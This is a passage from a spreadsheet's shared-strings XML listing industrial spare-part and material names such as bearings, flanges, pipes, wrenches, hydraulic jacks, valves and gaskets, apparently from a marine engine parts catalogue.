  <si>
    <t>ROLLER F. BEARING, RADIAL</t>
  </si>
  <si>
    <t>SEAL. OIL RING F. BEARING</t>
  </si>
  <si>
    <t>AXIAL BEARING BALL</t>
  </si>
  <si>
    <t>AXIAL BEARING WITH ROLLER</t>
  </si>
  <si>
    <t>ROLLER FOR BEARING, AXIAL</t>
  </si>
  <si>
    <t>SUPPORT,PARALLEL, PLATE</t>
  </si>
  <si>
    <t>SUPPORT,PARALLEL,SEC.IRON</t>
  </si>
  <si>
    <t>SUPPORT NON IRON</t>
  </si>
  <si>
    <t>SUPPORT, BASE FOR SUPPORT</t>
  </si>
  <si>
    <t>SUPPORT, PLATE</t>
  </si>
  <si>
    <t>SUPPORT,ANGULAR,SECT.IRON</t>
  </si>
  <si>
    <t>SUPPORT,ANGULAR,SUNDRY TY</t>
  </si>
  <si>
    <t>SUPPORT,&gt;90 DEG, PLATE</t>
  </si>
  <si>
    <t>SUPPORT,&gt;90 DEG,SECT.IRON</t>
  </si>
  <si>
    <t>SUPPORT,ALL ANG. NON IRON</t>
  </si>
  <si>
    <t>SUPPORT,&lt;90 DEG,SECT.IRON</t>
  </si>
  <si>
    <t>SUPPORT-CIRCULAR</t>
  </si>
  <si>
    <t>SUPPORT-CAST IRON</t>
  </si>
  <si>
    <t>SUPPORT FOR INSTRUMENTS</t>
  </si>
  <si>
    <t>BOSS FOR INSTRUMENTS</t>
  </si>
  <si>
    <t>BRACKET FOR COMPUTER</t>
  </si>
  <si>
    <t>FITTING OF COPPER</t>
  </si>
  <si>
    <t>COMPRESSION SPRING RIGHT</t>
  </si>
  <si>
    <t>COMPRESSION SPRING  LEFT</t>
  </si>
  <si>
    <t>ACTIVATOR</t>
  </si>
  <si>
    <t>LOCKING SPRING WASHER</t>
  </si>
  <si>
    <t>CYLINDRICAL PINS</t>
  </si>
  <si>
    <t>HEXAGON FIT BOLT</t>
  </si>
  <si>
    <t>HEXAGON SOCKET PLUG</t>
  </si>
  <si>
    <t>BLEEDING SCREW</t>
  </si>
  <si>
    <t>TREAD INSERT</t>
  </si>
  <si>
    <t>HEXAGON NIPPLE PLUG</t>
  </si>
  <si>
    <t>SOCK.W.TROUGHGOING THREAD</t>
  </si>
  <si>
    <t>COVER,CIRCULAR</t>
  </si>
  <si>
    <t>COVER,CIRCULAR W RECESS</t>
  </si>
  <si>
    <t>SCRAPER RING COVER-ROUND</t>
  </si>
  <si>
    <t>COVER, RECTANGULAR</t>
  </si>
  <si>
    <t>COVER, OVAL</t>
  </si>
  <si>
    <t>ANGLE IRON RING</t>
  </si>
  <si>
    <t>GUARD MADE OF PLASTIC</t>
  </si>
  <si>
    <t>GUARD-CIRCULAR-PLANE</t>
  </si>
  <si>
    <t>GUARD-RECTANGULAR-PLANE</t>
  </si>
  <si>
    <t>DEEP DISHED HEAD</t>
  </si>
  <si>
    <t>PISTON RING STEEL+C.IRON</t>
  </si>
  <si>
    <t>SCRAPER RING-STEEL+C.IRON</t>
  </si>
  <si>
    <t>ASSEMBLING PIECE</t>
  </si>
  <si>
    <t>SEALING RING-RUBBER</t>
  </si>
  <si>
    <t>SEALING RING- SPECIAL</t>
  </si>
  <si>
    <t>HOUSING FOR SEALING RING</t>
  </si>
  <si>
    <t>RING HALF-PART</t>
  </si>
  <si>
    <t>TANK CYLINDRICAL</t>
  </si>
  <si>
    <t>FLOAT</t>
  </si>
  <si>
    <t>VESSEL-BOX-SHAPED</t>
  </si>
  <si>
    <t>BOX, STEEL</t>
  </si>
  <si>
    <t>BOX WITH MOUNTING PLATE</t>
  </si>
  <si>
    <t>PARTS FOR WOODEN BOX</t>
  </si>
  <si>
    <t>CONDENSATION CHAMBER</t>
  </si>
  <si>
    <t>PACKING BOX</t>
  </si>
  <si>
    <t>STANCHION PARTS</t>
  </si>
  <si>
    <t>IDENTIFICATION CODES</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(0-4MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(5-9MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(10-14MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(15-19MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(20-29MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(30-39MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(40-49MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(50-74MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(75-100MM)</t>
  </si>
  <si>
    <t>FLAT STEEL BARS(100-&lt;MM)</t>
  </si>
  <si>
    <t>PLATE-IRON AND STEEL</t>
  </si>
  <si>
    <t>PLATE-BEND/BOLTED(75-99MM</t>
  </si>
  <si>
    <t>PLATE-COPPER</t>
  </si>
  <si>
    <t>PLATE-BRONZE</t>
  </si>
  <si>
    <t>PLATE-ALUMINIUM</t>
  </si>
  <si>
    <t>PLATE-ALUMINIUM,SECTIONAL</t>
  </si>
  <si>
    <t>PLATE-BRASS</t>
  </si>
  <si>
    <t>PLATE-BRASS, SECTIONAL</t>
  </si>
  <si>
    <t>PLATE-LEAD</t>
  </si>
  <si>
    <t>PLATE-LEAD, SECTIONAL</t>
  </si>
  <si>
    <t>STAINLESS STEEL</t>
  </si>
  <si>
    <t>ASBESTOS, SECTIONAL</t>
  </si>
  <si>
    <t>PLATE-ACRYL</t>
  </si>
  <si>
    <t>SECTIONAL WOOD</t>
  </si>
  <si>
    <t>PLATE-SPONGE RUBBER</t>
  </si>
  <si>
    <t>PLATE,RUBBER</t>
  </si>
  <si>
    <t>CHEQUER PLATE (4,5MM)</t>
  </si>
  <si>
    <t>CHEQUER PLATE (5 MM)</t>
  </si>
  <si>
    <t>CHEQUER PLATE (6 MM)</t>
  </si>
  <si>
    <t>CHEQUER PLATE (8 MM)</t>
  </si>
  <si>
    <t>CHEQUER PLATE-PERFORATED</t>
  </si>
  <si>
    <t>PERFORATED PLATE-STEEL</t>
  </si>
  <si>
    <t>WIRE GAUZE-STAINLESS</t>
  </si>
  <si>
    <t>EXPANDED METAL</t>
  </si>
  <si>
    <t>METAL SECTIONAL</t>
  </si>
  <si>
    <t>ALUMINIUM SECTIONAL</t>
  </si>
  <si>
    <t>ALUMINIU.PLATE-CORRUGATED</t>
  </si>
  <si>
    <t>HOLLOW BAR FOR MACHINING</t>
  </si>
  <si>
    <t>STEEL PIPE ( 0 -( 50))OD</t>
  </si>
  <si>
    <t>STEEL PIPE ( 50-(100))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (100-(150))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (150-(200))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (200-(250))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (250-(300))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (300-(350))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (350-(400))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (400-(450))OD</t>
  </si>
  <si>
    <t>STEEL PIPE (450-  &lt;  )OD</t>
  </si>
  <si>
    <t>MK-PIPE</t>
  </si>
  <si>
    <t>COPPER-NICKEL PIPE</t>
  </si>
  <si>
    <t>ALUMINIUM PIPE</t>
  </si>
  <si>
    <t>NON-METALLIC PIPE</t>
  </si>
  <si>
    <t>ROUND IRON, D&gt;L   0- 50</t>
  </si>
  <si>
    <t>ROUND IRON, D&gt;L  50- 75</t>
  </si>
  <si>
    <t>ROUND IRON, D&gt;L  75-100</t>
  </si>
  <si>
    <t>ROUND IRON, D&gt;L 100-</t>
  </si>
  <si>
    <t>ROUND IRON, D&lt;L  50- 75</t>
  </si>
  <si>
    <t>ROUND IRON, D&lt;L  75-100</t>
  </si>
  <si>
    <t>ROUND IRON, D&lt;L 100-</t>
  </si>
  <si>
    <t>SPRING WIRE</t>
  </si>
  <si>
    <t>IRON BLOCK</t>
  </si>
  <si>
    <t>SECTIONAL IRON, ANGLE</t>
  </si>
  <si>
    <t>SECTIONAL IRON, U</t>
  </si>
  <si>
    <t>SECTIONAL IRON, RHS</t>
  </si>
  <si>
    <t>SECTIONAL IRON, I</t>
  </si>
  <si>
    <t>SECTIONAL IRON, H</t>
  </si>
  <si>
    <t>SECTIONAL IRON, OTHER</t>
  </si>
  <si>
    <t>STEEL BALL,SOLID</t>
  </si>
  <si>
    <t>ELECTRODE,STELLITE</t>
  </si>
  <si>
    <t>WELD INSERT</t>
  </si>
  <si>
    <t>ELECTRODE,ALLOY 50</t>
  </si>
  <si>
    <t>WELDING POWDER</t>
  </si>
  <si>
    <t>ELECTRODE</t>
  </si>
  <si>
    <t>INCONEL COATING</t>
  </si>
  <si>
    <t>CR/NI COATING</t>
  </si>
  <si>
    <t>CR COATING</t>
  </si>
  <si>
    <t>ALUBRONZE</t>
  </si>
  <si>
    <t>GLASS FIBRE CLOTH</t>
  </si>
  <si>
    <t>INSULATION,GRANUL./POWDER</t>
  </si>
  <si>
    <t>INSULATION, MAT/STRIP</t>
  </si>
  <si>
    <t>INSULATION, FOIL/CLOTH</t>
  </si>
  <si>
    <t>INSULATION, PIPE</t>
  </si>
  <si>
    <t>INSULATION, MAT/ROLL</t>
  </si>
  <si>
    <t>INSULATION, FELT</t>
  </si>
  <si>
    <t>COPPER MESH F. FILTER</t>
  </si>
  <si>
    <t>SOUND INSULATION-PVC</t>
  </si>
  <si>
    <t>INSULATION PIN</t>
  </si>
  <si>
    <t>CLIPS, INSULATION</t>
  </si>
  <si>
    <t>TAPE, SELF-ADHESIVE</t>
  </si>
  <si>
    <t>PIPE END INSUL. SLEEVE</t>
  </si>
  <si>
    <t>SLIP ON WELDING FLANGE</t>
  </si>
  <si>
    <t>LAPPED FLANGE</t>
  </si>
  <si>
    <t>PLAIN COLLAR</t>
  </si>
  <si>
    <t>FLANGE, SPECIAL</t>
  </si>
  <si>
    <t>OVAL BLIND FLANGE</t>
  </si>
  <si>
    <t>OVAL FLANGE - BLANK</t>
  </si>
  <si>
    <t>SQUARE FLANGE - BLANK</t>
  </si>
  <si>
    <t>PACKING, ROUND</t>
  </si>
  <si>
    <t>PACKING, SQUARE</t>
  </si>
  <si>
    <t>PACKING, OVAL</t>
  </si>
  <si>
    <t>PACKING, SPECIAL</t>
  </si>
  <si>
    <t>TRIANGULAR PACKING</t>
  </si>
  <si>
    <t>THURST COLLAR</t>
  </si>
  <si>
    <t>TRIANGULAR FLANGE</t>
  </si>
  <si>
    <t>SYNTHETIC RUBBER CORD</t>
  </si>
  <si>
    <t>ELECTRICAL VALVE</t>
  </si>
  <si>
    <t>PACKING-RECTANGLE-FIBRE</t>
  </si>
  <si>
    <t>STRAIGTH FEMALE COUPLING</t>
  </si>
  <si>
    <t>RED. ADAPTOR, MALE/FEMALE</t>
  </si>
  <si>
    <t>ADJUSTABLE L-COUPLING</t>
  </si>
  <si>
    <t>REDUCING STAND PIPES</t>
  </si>
  <si>
    <t>STRAIGTH COUPLING</t>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW</t>
  </si>
  <si>
    <t>BANJO COUPLING</t>
  </si>
  <si>
    <t>MALE STUD TEE COUPLING</t>
  </si>
  <si>
    <t>MALE STUD L-COUPLING</t>
  </si>
  <si>
    <t>STRAIGTH MALE STUD FITTIN</t>
  </si>
  <si>
    <t>REDUCING FITTING</t>
  </si>
  <si>
    <t>ADJSTABLE T-COUPLING</t>
  </si>
  <si>
    <t>EQUAL ELBOW COUPL.W.RESTR</t>
  </si>
  <si>
    <t>EQUAL ELBOW COUPLING</t>
  </si>
  <si>
    <t>STRAIGTH COUPL.W. RESTRIC</t>
  </si>
  <si>
    <t>CLIP</t>
  </si>
  <si>
    <t>COMPENSATOR PICK-UP</t>
  </si>
  <si>
    <t>REDUC. VALVE W. MANOMETER</t>
  </si>
  <si>
    <t>VENTING PIPE VALVE</t>
  </si>
  <si>
    <t>SELF CLOSING VALVE</t>
  </si>
  <si>
    <t>PNEUMATIC VAVLE</t>
  </si>
  <si>
    <t>SEAT NON RETURN VALVE</t>
  </si>
  <si>
    <t>HEATING CABLE</t>
  </si>
  <si>
    <t>ELECTRIC HEATER</t>
  </si>
  <si>
    <t>AUXILIARY CONTACT</t>
  </si>
  <si>
    <t>POCKET</t>
  </si>
  <si>
    <t>PRESSOSTATE</t>
  </si>
  <si>
    <t>DIFFERENCE PRESSOSTATE</t>
  </si>
  <si>
    <t>MEASURING AMPLIFIER</t>
  </si>
  <si>
    <t>FLANGE SPECIAL</t>
  </si>
  <si>
    <t>LEVEL SWITCH RELAY</t>
  </si>
  <si>
    <t>MOUNTING PLUG</t>
  </si>
  <si>
    <t>LEAK DETECTOR</t>
  </si>
  <si>
    <t>FLOW SWITCH</t>
  </si>
  <si>
    <t>TEMPERATURE TRANSMITTER</t>
  </si>
  <si>
    <t>PLATE F. THERMO/PRESSOST.</t>
  </si>
  <si>
    <t>MAS-MODUL</t>
  </si>
  <si>
    <t>MAIN BEARING FEELER</t>
  </si>
  <si>
    <t>LOW LOAD CONTROL SYSTEM</t>
  </si>
  <si>
    <t>RC-LINK</t>
  </si>
  <si>
    <t>PICK-UP FOR MAN T/C</t>
  </si>
  <si>
    <t>PUMP TACHOMETER</t>
  </si>
  <si>
    <t>M.O.P. WITH CAMS</t>
  </si>
  <si>
    <t>SPEED TRANSDUCER</t>
  </si>
  <si>
    <t>PENDANT CONTROLSTATION</t>
  </si>
  <si>
    <t>PLUG CONNECTOR</t>
  </si>
  <si>
    <t>DISPLAY</t>
  </si>
  <si>
    <t>DIGITAL REFERENCE UNIT</t>
  </si>
  <si>
    <t>DIODE ARRAY</t>
  </si>
  <si>
    <t>BRIDGE RECTIFIER</t>
  </si>
  <si>
    <t>TERMINAL BOX (W75)</t>
  </si>
  <si>
    <t>START AND SLOW TURN. BOX</t>
  </si>
  <si>
    <t>FUSE-BASE</t>
  </si>
  <si>
    <t>FUSE</t>
  </si>
  <si>
    <t>AMPLIFIER RELAY</t>
  </si>
  <si>
    <t>DC/DC - CONVERTER</t>
  </si>
  <si>
    <t>PRINTCARD RELAY BOX</t>
  </si>
  <si>
    <t>INDUTIVE SENSOR</t>
  </si>
  <si>
    <t>DELAYED CONTACT</t>
  </si>
  <si>
    <t>PHASE BREAKING RELAY</t>
  </si>
  <si>
    <t>ACCESSORIES FOR S-SYTSEM</t>
  </si>
  <si>
    <t>AUXILLIARY RELAY</t>
  </si>
  <si>
    <t>PI REGULATOR TEMP.</t>
  </si>
  <si>
    <t>LIGHTED PUSHBUTTON</t>
  </si>
  <si>
    <t>ACCESORIES FOR RELAY</t>
  </si>
  <si>
    <t>NEOPREN BUSH</t>
  </si>
  <si>
    <t>TERMINAL BLOCK PLATE</t>
  </si>
  <si>
    <t>POSITION SWITCH</t>
  </si>
  <si>
    <t>FITTING</t>
  </si>
  <si>
    <t>SPEED RELAY PLATE</t>
  </si>
  <si>
    <t>RED. ADAPTORS MALE/FEMALE</t>
  </si>
  <si>
    <t>HOLE PLUG</t>
  </si>
  <si>
    <t>BLIND PLATE</t>
  </si>
  <si>
    <t>ICS CONTROL UNIT</t>
  </si>
  <si>
    <t>CABLE BINDER</t>
  </si>
  <si>
    <t>CABLE TRAY</t>
  </si>
  <si>
    <t>FUSE COMPONENTS</t>
  </si>
  <si>
    <t>PNEUMATIC VALVE, 2/2 NC</t>
  </si>
  <si>
    <t>PNEUMATIC VALVE, 3/2 NC</t>
  </si>
  <si>
    <t>AIR PRESSURE REGULATOR</t>
  </si>
  <si>
    <t>SOLENOID VALVE 2/2, NC</t>
  </si>
  <si>
    <t>SOLENOID VALVE 3/2, NC</t>
  </si>
  <si>
    <t>SOLENOID VALVE 3/2, NO</t>
  </si>
  <si>
    <t>SOLENOID VALVE 5/2</t>
  </si>
  <si>
    <t>DOUBLE NON.RETURN VALVE</t>
  </si>
  <si>
    <t>SOLENOID VALVE, 5/3 OC</t>
  </si>
  <si>
    <t>PILOT VALVE</t>
  </si>
  <si>
    <t>PNEUMATIC CYLINDER</t>
  </si>
  <si>
    <t>RELAY F.INDUCTIVE SENSOR</t>
  </si>
  <si>
    <t>STEAM TRAP</t>
  </si>
  <si>
    <t>TUBULAR BOX WRENCH</t>
  </si>
  <si>
    <t>HEX. SOCKET WRENCH DOUBLE</t>
  </si>
  <si>
    <t>WRENCH, SPECIAL</t>
  </si>
  <si>
    <t>SOCKET WRENCH,PNEUM. TOOL</t>
  </si>
  <si>
    <t>TEE HANDLED SOCKET WRENCH</t>
  </si>
  <si>
    <t>WRENCH-SPECIAL</t>
  </si>
  <si>
    <t>SOCKET WRENCH, OUTS. HEX</t>
  </si>
  <si>
    <t>SOCKET WRENCH-SPECIAL</t>
  </si>
  <si>
    <t>KEY HEXAGON SOCKET</t>
  </si>
  <si>
    <t>KEY HEX. SOCKET, SOCKET W</t>
  </si>
  <si>
    <t>SOCKET WRENCH 90 OFFSET</t>
  </si>
  <si>
    <t>PIN IMPACT WRENCH</t>
  </si>
  <si>
    <t>CROWFOOT WRENCH</t>
  </si>
  <si>
    <t>SPECIAL SLOTTED WRENCH</t>
  </si>
  <si>
    <t>OPEN JAW WRENCH</t>
  </si>
  <si>
    <t>OPEN JAW SLUGGING WRENCH</t>
  </si>
  <si>
    <t>OPEN RING WRENCH</t>
  </si>
  <si>
    <t>CROWFOOT WRENCH HEAD</t>
  </si>
  <si>
    <t>OPEN JAW WRENCH-SPECIAL</t>
  </si>
  <si>
    <t>FLAT RING WRENCH</t>
  </si>
  <si>
    <t>SLUGGING RING WRENCH</t>
  </si>
  <si>
    <t>SLUGG.RING WRENCH-OFFSET</t>
  </si>
  <si>
    <t>DOUBLE ENDED RING WRENCH</t>
  </si>
  <si>
    <t>SLUGGING WRENCH HEAD</t>
  </si>
  <si>
    <t>WRENCH WITH SQUARE</t>
  </si>
  <si>
    <t>RING WRENCH, SPECIAL</t>
  </si>
  <si>
    <t>COMBINATION WRENCH-OFFSET</t>
  </si>
  <si>
    <t>TORQUE WRENCH OFFSET TOOL</t>
  </si>
  <si>
    <t>ADAPTER FOR SOCKET WRENCH</t>
  </si>
  <si>
    <t>TEE HANDLE</t>
  </si>
  <si>
    <t>UNIVERSAL JOINT</t>
  </si>
  <si>
    <t>WRENCH HEAD WITH SLOT</t>
  </si>
  <si>
    <t>EXTENSION BAR</t>
  </si>
  <si>
    <t>PARTS FOR HEXAGON SPANNER</t>
  </si>
  <si>
    <t>WRENCH WITH GEAR</t>
  </si>
  <si>
    <t>CHAIN DISASSEMBLING TOOL</t>
  </si>
  <si>
    <t>CLAW FOR CHAIN ASSEMBLER</t>
  </si>
  <si>
    <t>SCREW DRIVER F.PLUG SCREW</t>
  </si>
  <si>
    <t>MANDREL</t>
  </si>
  <si>
    <t>RETAINER FORK</t>
  </si>
  <si>
    <t>STUD SETTER, SCREW</t>
  </si>
  <si>
    <t>DRAWING TOOL-TRAVERSE</t>
  </si>
  <si>
    <t>DRAWING TOOL-BELL SHAPED</t>
  </si>
  <si>
    <t>DRAWING TOOL, BELL SHAPED</t>
  </si>
  <si>
    <t>EXTRACTOR, CROSSBAR</t>
  </si>
  <si>
    <t>DRAWING TOOL WITH JAWS</t>
  </si>
  <si>
    <t>STEPPED DRIFT</t>
  </si>
  <si>
    <t>DRAWING TOOL, VARIOUS</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(CYLINDER)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(PISTON)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(COVER)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC, SUPPORT</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(TOOLS)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(COMPLETE)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC (DRAW NUT)</t>
  </si>
  <si>
    <t>JACK,HYDRAULIC (EXT. NUT)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(SUPPORT)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC, INT. NUT</t>
  </si>
  <si>
    <t>MANUAL HIGH PRESSURE PUMP</t>
  </si>
  <si>
    <t>TEST PIECE</t>
  </si>
  <si>
    <t>JACK-MECHANICAL(SUPPORT)</t>
  </si>
  <si>
    <t>JACK-MECHANIC.(PARTS FOR)</t>
  </si>
  <si>
    <t>GUIDE SCREW F.SPINDLES</t>
  </si>
  <si>
    <t>GUIDE NUT F.SPINDLES</t>
  </si>
  <si>
    <t>GUIDEWAY</t>
  </si>
  <si>
    <t>DISTANCE GUIDE</t>
  </si>
  <si>
    <t>PUSHER</t>
  </si>
  <si>
    <t>SIZER</t>
  </si>
  <si>
    <t>SPRING BALANCE</t>
  </si>
  <si>
    <t>SUCTION LIFTER</t>
  </si>
  <si>
    <t>WIRE GUIDE F.MAIN BRG.CAP</t>
  </si>
  <si>
    <t>FORK FOR GROOVED PULLEY</t>
  </si>
  <si>
    <t>LIFTING DEVICE-VARIOUS</t>
  </si>
  <si>
    <t>PLATFORM BOARD</t>
  </si>
  <si>
    <t>WORKING PLATFORM SUPPORT</t>
  </si>
  <si>
    <t>BRACKET FOR PLATFORM</t>
  </si>
  <si>
    <t>BRACKET FOR LADDER</t>
  </si>
  <si>
    <t>LIFTING DEVICE-PARTS</t>
  </si>
  <si>
    <t>LIFTING DEVICE-COLLAR</t>
  </si>
  <si>
    <t>END MILL</t>
  </si>
  <si>
    <t>SIDE MILL</t>
  </si>
  <si>
    <t>SIDE MILL WITH CYL.SHAFT</t>
  </si>
  <si>
    <t>CUTTER-SPECIAL</t>
  </si>
  <si>
    <t>TAP WRENCH</t>
  </si>
  <si>
    <t>SPINDLE WITH TAPER</t>
  </si>
  <si>
    <t>GRINDSTONE</t>
  </si>
  <si>
    <t>GRINDING MANDREL</t>
  </si>
  <si>
    <t>GRINDING BAND</t>
  </si>
  <si>
    <t>FLAP WHEEL</t>
  </si>
  <si>
    <t>GRINDING MACHINE, SUPPORT</t>
  </si>
  <si>
    <t>THREAD TAP, M-BSP-WG</t>
  </si>
  <si>
    <t>DIE NUT</t>
  </si>
  <si>
    <t>COUNTERSINK</t>
  </si>
  <si>
    <t>DRILL-PARALLEL</t>
  </si>
  <si>
    <t>DRILL-PARALLEL CLEANING</t>
  </si>
  <si>
    <t>EXTENSION, CUTTING TOOL</t>
  </si>
  <si>
    <t>BORING BUSH WITH COLLAR</t>
  </si>
  <si>
    <t>BORING BUSH</t>
  </si>
  <si>
    <t>GUIDE FOR CUTTING TOOL</t>
  </si>
  <si>
    <t>DRILLING MACHINE</t>
  </si>
  <si>
    <t>ACCESSORIES FOR TOOLS</t>
  </si>
  <si>
    <t>DRILL, MORSE TAPER</t>
  </si>
  <si>
    <t>MORSE TAPER</t>
  </si>
  <si>
    <t>BORING ROD W.MORSE TAPER</t>
  </si>
  <si>
    <t>SCRAPER BLADE</t>
  </si>
  <si>
    <t>HONE - BRUSH</t>
  </si>
  <si>
    <t>CLEANING PIPE-STEAM</t>
  </si>
  <si>
    <t>TUBE EXPANDER</t>
  </si>
  <si>
    <t>DIAL GAUGE</t>
  </si>
  <si>
    <t>MICROMETER CALIPER</t>
  </si>
  <si>
    <t>STAND F.MICROMETER HEAD</t>
  </si>
  <si>
    <t>MARKING-OFF PLAN</t>
  </si>
  <si>
    <t>MEASURING BLOCK</t>
  </si>
  <si>
    <t>LIMIT GAUGE</t>
  </si>
  <si>
    <t>SPARE TIP F. FEELER GAUGE</t>
  </si>
  <si>
    <t>BRIDGE GAUGE, PARTS</t>
  </si>
  <si>
    <t>INTERNAL CYL.GAUGE</t>
  </si>
  <si>
    <t>TEST MANDREL, VALVE SEAT</t>
  </si>
  <si>
    <t>MEASURING ROD</t>
  </si>
  <si>
    <t>STRAIGHT RAIL</t>
  </si>
  <si>
    <t>TIGHTENING GAUGE</t>
  </si>
  <si>
    <t>PIPE, STRAIGHT ROLLED</t>
  </si>
  <si>
    <t>PIPE-ST., ROLLED, CONICAL</t>
  </si>
  <si>
    <t>PIPE-STRAIGHT WITH HOLES</t>
  </si>
  <si>
    <t>PIPE, BENT</t>
  </si>
  <si>
    <t>PIPE, BENT WITH HOLES</t>
  </si>
  <si>
    <t>PIPE,STRAIGHT, NON METAL.</t>
  </si>
  <si>
    <t>PIPE,BENT, NON METALLIC</t>
  </si>
  <si>
    <t>HOSE, STEEL WEAVED SMOOTH</t>
  </si>
  <si>
    <t>HOSE, SPECIAL PROFILE</t>
  </si>
  <si>
    <t>FLEX. STEEL TUBE</t>
  </si>
  <si>
    <t>PIPE,STRAIGHT,EXT.THREADS</t>
  </si>
  <si>
    <t>PIPE,STRA.EXT.INT.THREADS</t>
  </si>
  <si>
    <t>PIPE,STRAIGHT, MACHINED</t>
  </si>
  <si>
    <t>PIPE,CURVED, WITH THREAD</t>
  </si>
  <si>
    <t>PIPE,BEND, W. 1 FLANGE</t>
  </si>
  <si>
    <t>PIPE,CURVED W. UNION</t>
  </si>
  <si>
    <t>PIPE BEND, SPECIAL</t>
  </si>
  <si>
    <t>PIPE BEND W THREAD, 90 DG</t>
  </si>
  <si>
    <t>PIPE BEND, EXT/INT THRD.</t>
  </si>
  <si>
    <t>PIPE BEND, PLAIN, #90 DG</t>
  </si>
  <si>
    <t>PIPE BEND W THREAD,#90 DG</t>
  </si>
  <si>
    <t>PIPE BEND WITH FLANGE</t>
  </si>
  <si>
    <t>UNION ELBOW, PLAIN, 90 DG</t>
  </si>
  <si>
    <t>UNION WITH FLANGE</t>
  </si>
  <si>
    <t>UNION W. INTERNAL THREAD</t>
  </si>
  <si>
    <t>UNION W. EXTERNAL THREAD</t>
  </si>
  <si>
    <t>UNION W. EX/INT THREAD</t>
  </si>
  <si>
    <t>REDUCING SOCKET</t>
  </si>
  <si>
    <t>REDUCING NIPPLE+SOCKET</t>
  </si>
  <si>
    <t>HEXAGON NIPPLE</t>
  </si>
  <si>
    <t>TEE PIECE, PLAIN</t>
  </si>
  <si>
    <t>TEE PIECE, WITH FLANGE</t>
  </si>
  <si>
    <t>TEE PIECE, EXT. THREAD</t>
  </si>
  <si>
    <t>TEE PIECE,INTERNAL THREAD</t>
  </si>
  <si>
    <t>TEE PIECE,EXT/INT THREAD</t>
  </si>
  <si>
    <t>BRANCH PIECE, PLAIN</t>
  </si>
  <si>
    <t>BRANCH PIECE, EXT. THREAD</t>
  </si>
  <si>
    <t>BRANCH PIECE, INT. THREAD</t>
  </si>
  <si>
    <t>BRANCH P. INT/EXT THREAD</t>
  </si>
  <si>
    <t>BRANCH PIECE, W. GROOVE</t>
  </si>
  <si>
    <t>BRANCH PIPE,INSIDE THREAD</t>
  </si>
  <si>
    <t>BRANCH PIPE,OUTS. THREAD</t>
  </si>
  <si>
    <t>BRANCH PIPE,OUT/IN THREAD</t>
  </si>
  <si>
    <t>FUNNEL, PARTS FOR</t>
  </si>
  <si>
    <t>CONE FOR FUNNELS</t>
  </si>
  <si>
    <t>FLANGE,CIRCULAR PLAIN</t>
  </si>
  <si>
    <t>FLANGE,CIRCULAR WITH NECK</t>
  </si>
  <si>
    <t>FLANGE,CIRC. W. INCISION</t>
  </si>
  <si>
    <t>FLANGE,SPECIAL</t>
  </si>
  <si>
    <t>FLANGE,SAE-FLARE</t>
  </si>
  <si>
    <t>FLANGE,MALE THREAD</t>
  </si>
  <si>
    <t>FLANGE,TEE</t>
  </si>
  <si>
    <t>FLANGE,ELBOW</t>
  </si>
  <si>
    <t>FLANGE,REDUCTION</t>
  </si>
  <si>
    <t>FLANGE,TEE BETWEEN</t>
  </si>
  <si>
    <t>SEA FLARE CONE</t>
  </si>
  <si>
    <t>FLANGE,SAEWITH NECK</t>
  </si>
  <si>
    <t>FLANGE, RECTANGLE</t>
  </si>
  <si>
    <t>FLANGE,SQUARE WITH NECK</t>
  </si>
  <si>
    <t>FLANGE,SQUARE</t>
  </si>
  <si>
    <t>FLANGE, SQUARE</t>
  </si>
  <si>
    <t>FLANGE,RECTANGLE</t>
  </si>
  <si>
    <t>FLANGE,OVAL</t>
  </si>
  <si>
    <t>FLANGE,OVAL EDGED</t>
  </si>
  <si>
    <t>FLANGE,TRIANGULAR</t>
  </si>
  <si>
    <t>PACKING-ROUND</t>
  </si>
  <si>
    <t>PACKING-ROUND-FIBRE</t>
  </si>
  <si>
    <t>PACKING-ROUND-FELT</t>
  </si>
  <si>
    <t>PACKING-ROUND-RUBBER</t>
  </si>
  <si>
    <t>PACKING-ROUND-EXHAUST GAS</t>
  </si>
  <si>
    <t>GASKET, ROUND SPECIAL</t>
  </si>
  <si>
    <t>PACKING-RECTANGLE</t>
  </si>
  <si>
    <t>PACKING, RECTANGLE</t>
  </si>
  <si>
    <t>PACKING,OVAL</t>
  </si>
  <si>
    <t>PACKING-OVAL-RUBBER</t>
  </si>
  <si>
    <t>PACKING-ANGULAR-FIBRE</t>
  </si>
  <si>
    <t>PACKING-EDGED-RUBBER</t>
  </si>
  <si>
    <t>PACKING-FIBRE</t>
  </si>
  <si>
    <t>PACKING-RUBBER</t>
  </si>
  <si>
    <t>PACKING-EXHAUST GAS</t>
  </si>
  <si>
    <t>PACKING, OVAL EDGED</t>
  </si>
  <si>
    <t>PACKING MATR.-SECTIONAL</t>
  </si>
  <si>
    <t>PACKING MATR. SEE 573360</t>
  </si>
  <si>
    <t>PACKING MATERIAL-PLATE</t>
  </si>
  <si>
    <t>SQUARE-SECTION SEAL.RING</t>
  </si>
  <si>
    <t>SEALING MATERIAL, ROUND</t>
  </si>
  <si>
    <t>D-RING</t>
  </si>
  <si>
    <t>X-RING</t>
  </si>
  <si>
    <t>ASBESTOS CORD</t>
  </si>
  <si>
    <t>CUP PACKING</t>
  </si>
  <si>
    <t>SEALANT</t>
  </si>
  <si>
    <t>LUBRICANT</t>
  </si>
  <si>
